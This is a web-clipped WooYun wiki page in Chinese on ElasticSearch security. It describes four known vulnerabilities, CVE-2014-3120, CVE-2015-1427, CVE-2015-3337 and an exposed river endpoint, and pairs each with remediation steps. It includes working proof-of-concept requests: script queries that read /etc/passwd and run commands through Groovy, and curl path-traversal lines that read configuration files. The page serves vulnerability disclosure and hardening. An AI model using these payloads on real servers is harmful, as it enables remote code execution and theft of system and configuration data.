-
Notifications
You must be signed in to change notification settings - Fork 58
/
Copy pathserver:elasticsearch [WooYun WiKi].html
176 lines (121 loc) · 12.7 KB
/
server:elasticsearch [WooYun WiKi].html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta name="exporter-version" content="Evernote Mac 6.8 (453748)"/><meta name="created" content="2016-10-19 12:41:56 +0000"/><meta name="source" content="web.clip"/><meta name="source-url" content="http://wiki.wooyun.org/server:elasticsearch"/><meta name="updated" content="2016-10-19 12:41:56 +0000"/><title>server:elasticsearch [WooYun WiKi]</title></head><body><div style="-evernote-webclip:true"><br/><div style="font-size: 16px"><div style="box-sizing:border-box;font-family:sans-serif;text-size-adjust:100%;font-size:10px;-webkit-tap-highlight-color:rgba(0, 0, 0, 0);"><div style="box-sizing:border-box;font-family:"Helvetica Neue", Helvetica, Arial, sans-serif;font-size:small;line-height:1.42857;color:rgb(51, 51, 51);background:rgb(253, 253, 253);"><div style="box-sizing:border-box;"><div style="box-sizing:border-box;"><span style="box-sizing:border-box;"><div style="box-sizing:border-box;"><div style="box-sizing:border-box;background-color:rgb(255, 255, 255);border-radius:4px;box-shadow:rgba(0, 0, 0, 0.0470588) 0px 1px 1px;"><div style="box-sizing:border-box;"><span style="display:table;"/>
<div style="box-sizing:border-box;position:fixed;float:right;z-index:1024;top:10px;right:10px;">
<div style="float:right;box-sizing:border-box;background-color:rgb(255, 255, 255);border-radius:4px;box-shadow:rgba(0, 0, 0, 0.0470588) 0px 1px 1px;border-color:rgb(221, 221, 221);border:1px solid transparent;margin:0px 0px 1.4em 1.4em;width:auto;color:inherit;font-size:0.95em;margin-left:20px;">
<h3 style="border-bottom:1px solid transparent;box-sizing:border-box;border-top-left-radius:3px;font-weight:bold;color:rgb(51, 51, 51);border-color:rgb(221, 221, 221);background-color:rgb(245, 245, 245);font-family:inherit;line-height:1.1;border-top-right-radius:3px;padding:5px;font-size:0.95em;margin:0px;cursor:pointer;"><i style="box-sizing:border-box;position:relative;top:1px;display:inline-block;font-family:"Glyphicons Halflings";font-style:normal;font-weight:400;line-height:1;-webkit-font-smoothing:antialiased;padding-right:5px;"><span style="font-family:"Glyphicons Halflings";font-style:normal;font-weight:400;line-height:1;"></span></i> <strong style="line-height:1;font-weight:400;top:1px;display:inline-block;font-family:"Glyphicons Halflings";font-style:normal;position:relative;-webkit-font-smoothing:antialiased;box-sizing:border-box;float:right;margin:0px 0.2em;padding-right:5px;"><span style="font-weight:400;font-family:"Glyphicons Halflings";font-style:normal;line-height:1;"></span></strong></h3>
</div>
</div>
<h1 style="box-sizing:border-box;font-size:36px;font-family:inherit;font-weight:500;line-height:1.1;color:inherit;margin:40px 0px 20px;padding-bottom:9px;border-bottom:1px solid rgb(238, 238, 238);margin-top:10px;">ElasticSearch安全配置</h1>
<div style="box-sizing:border-box;"
/>
<h3 style="box-sizing:border-box;font-family:inherit;font-weight:500;line-height:1.1;color:inherit;margin-top:20px;margin-bottom:10px;font-size:24px;">1、ElasticSearch简介</h3>
<div style="box-sizing:border-box;">
<p style="box-sizing:border-box;margin:0px 0px 10px;">
ElasticSearch是JAVA开发的一个基于Lucene的搜索服务器,它提供了一个分布式多用户能力的全文搜索引擎。
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
很多小伙伴用ElasticSearch配合其它工具进行日志分析平台的搭建,但是ElasticSearch不同版本存在多个漏洞。
</p>
<hr style="border-left-style:initial;height:0px;margin-top:20px;margin-bottom:20px;border-width:1px 0px 0px;border-right-style:initial;border-bottom-style:initial;box-sizing:content-box;border-right-color:initial;border-bottom-color:initial;border-left-color:initial;border-image:initial;border-top-style:solid;border-top-color:rgb(238, 238, 238);"/>
</div>
<h3 style="box-sizing:border-box;font-family:inherit;font-weight:500;line-height:1.1;color:inherit;margin-top:20px;margin-bottom:10px;font-size:24px;">2、ElasticSearch漏洞</h3>
<div style="box-sizing:border-box;"
/>
<h4 style="box-sizing:border-box;font-family:inherit;font-weight:500;line-height:1.1;color:inherit;margin-top:10px;margin-bottom:10px;font-size:18px;">2.1 ElasticSearch远程命令执行(CVE-2014-3120)</h4>
<div style="box-sizing:border-box;">
<p style="box-sizing:border-box;margin:0px 0px 10px;">
漏洞介绍:
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
ElasticSearch有脚本执行(scripting)的功能,可以很方便地对查询出来的数据再加工处理。ElasticSearch用的脚本引擎是MVEL,这个引擎没有做任何的防护,或者沙盒包装,所以直接可以执行任意代码。
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
而在ElasticSearch 1.2之前的版本中,默认配置是打开动态脚本功能的,如果用户没有更改默认配置文件,攻击者可以直接通过http请求执行任意代码。
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
测试POC:
</p>
<pre style="line-height:1.42857;overflow:auto;font-size:13px;box-sizing:border-box;display:block;padding:9.5px;margin:0px 0px 10px;font-family:Menlo, Monaco, Consolas, "Courier New", monospace;color:rgb(51, 51, 51);word-break:break-all;word-wrap:break-word;background-color:rgb(245, 245, 245);border:1px solid rgb(204, 204, 204);border-radius:4px;">http://127.0.0.1:9200/_search?source=%7B%22size%22%3A1%2C%22query%22%3A%7B%22filtered%22%3A%7B%22query%22%3A%7B%22match_all%22%3A%7B%7D%7D%7D%7D%2C%22script_fields%22%3A%7B%22%2Fetc%2Fhosts%22%3A%7B%22script%22%3A%22import%20java.util.*%3B%5Cnimport%20java.io.*%3B%5Cnnew%20Scanner(new%20File(%5C%22%2Fetc%2Fhosts%5C%22)).useDelimiter(%5C%22%5C%5C%5C%5CZ%5C%22).next()%3B%22%7D%2C%22%2Fetc%2Fpasswd%22%3A%7B%22script%22%3A%22import%20java.util.*%3B%5Cnimport%20java.io.*%3B%5Cnnew%20Scanner(new%20File(%5C%22%2Fetc%2Fpasswd%5C%22)).useDelimiter(%5C%22%5C%5C%5C%5CZ%5C%22).next()%3B%22%7D%7D%7D&callback=jQuery111107529820275958627_1400564696673&_=1400564696674</pre>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
修复方法:
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
1,升级ElasticSearch为最新版本;
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
2,在配置文件elasticsearch.yml里为每一个节点都加上:script.disable_dynamic: true。
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
漏洞案例:
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
<a href="https://web.archive.org/web/20160307185123/http://wooyun.org/bugs/wooyun-2014-061672" title="http://wooyun.org/bugs/wooyun-2014-061672" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">果壳网某服务远程命令执行漏洞(非st2)</a>
</p>
</div>
<h4 style="box-sizing:border-box;font-family:inherit;font-weight:500;line-height:1.1;color:inherit;margin-top:10px;margin-bottom:10px;font-size:18px;">2.2 Elasticsearch Groovy命令执行漏洞(CVE-2015-1427)</h4>
<div style="box-sizing:border-box;">
<p style="box-sizing:border-box;margin:0px 0px 10px;">
漏洞介绍:
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
该漏洞主要存在于ElastciSearch 1.3.0-1.3.7和1.4.0-1.4.2,ElasticSearch在比较新的版本中脚本语言引擎使用了Groovy,并且加入了沙盒进行控制,危险代码会被拦截掉。由于沙盒限制不严格,导致存在该漏洞。
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
测试POC:
</p>
<pre style="line-height:1.42857;overflow:auto;font-size:13px;box-sizing:border-box;display:block;padding:9.5px;margin:0px 0px 10px;font-family:Menlo, Monaco, Consolas, "Courier New", monospace;color:rgb(51, 51, 51);word-break:break-all;word-wrap:break-word;background-color:rgb(245, 245, 245);border:1px solid rgb(204, 204, 204);border-radius:4px;">POST http://127.0.0.1:9200/_search?pretty
{"size":1,"script_fields": {"test#": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}</pre>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
修复方法:
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
1,升级ElasticSearch为最新版本;
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
2,在配置文件elasticsearch.yml里为每一个节点都加上:script.groovy.sandbox.enabled: true。
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
漏洞案例:
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
<a href="https://web.archive.org/web/20160307185123/http://www.wooyun.org/bugs/wooyun-2015-099572" title="http://www.wooyun.org/bugs/wooyun-2015-099572" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">启维文化某服务器ElasticSearch Groovy命令执行漏洞</a>
</p>
</div>
<h4 style="box-sizing:border-box;font-family:inherit;font-weight:500;line-height:1.1;color:inherit;margin-top:10px;margin-bottom:10px;font-size:18px;">2.3 Elasticsearch 任意文件读取漏洞(CVE-2015-3337)</h4>
<div style="box-sizing:border-box;">
<p style="box-sizing:border-box;margin:0px 0px 10px;">
测试POC:
</p>
<pre style="line-height:1.42857;overflow:auto;font-size:13px;box-sizing:border-box;display:block;padding:9.5px;margin:0px 0px 10px;font-family:Menlo, Monaco, Consolas, "Courier New", monospace;color:rgb(51, 51, 51);word-break:break-all;word-wrap:break-word;background-color:rgb(245, 245, 245);border:1px solid rgb(204, 204, 204);border-radius:4px;">curl http://127.0.0.1:9200/_plugin/head/../../config/elasticsearch.yml 注意curl版本
curl http://127.0.0.1:9200/_plugin/插件名称如head/../../xx文件</pre>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
修复方法:
1,升级ElasticSearch为最新版本
</p>
</div>
<h4 style="box-sizing:border-box;font-family:inherit;font-weight:500;line-height:1.1;color:inherit;margin-top:10px;margin-bottom:10px;font-size:18px;">2.4 Elasticsearch 数据库配置文件读取问题</h4>
<div style="box-sizing:border-box;">
<p style="box-sizing:border-box;margin:0px 0px 10px;">
测试POC:
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
<a href="https://web.archive.org/web/20160307185123/http://localhost:9200/_river/search" title="http://localhost:9200/_river/search" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">http://localhost:9200/_river/search</a>
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
<a href="https://web.archive.org/web/20160307185123/https://www.exploit-db.com/exploits/37054/" title="https://www.exploit-db.com/exploits/37054/" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">exp-db:CVE-2015-3337</a>
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
修复方法:
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
1、安装elasticsearch官方的Shield
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
2、添加iptables规则
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
3、设置elasticsearch.yml文件中的network.bind_host: 内网ip,仅允许内网访问
</p>
</div>
<span style="display:table;clear:both;"/></div></div></div></span></div></div></div></div></div><br/></div></body></html>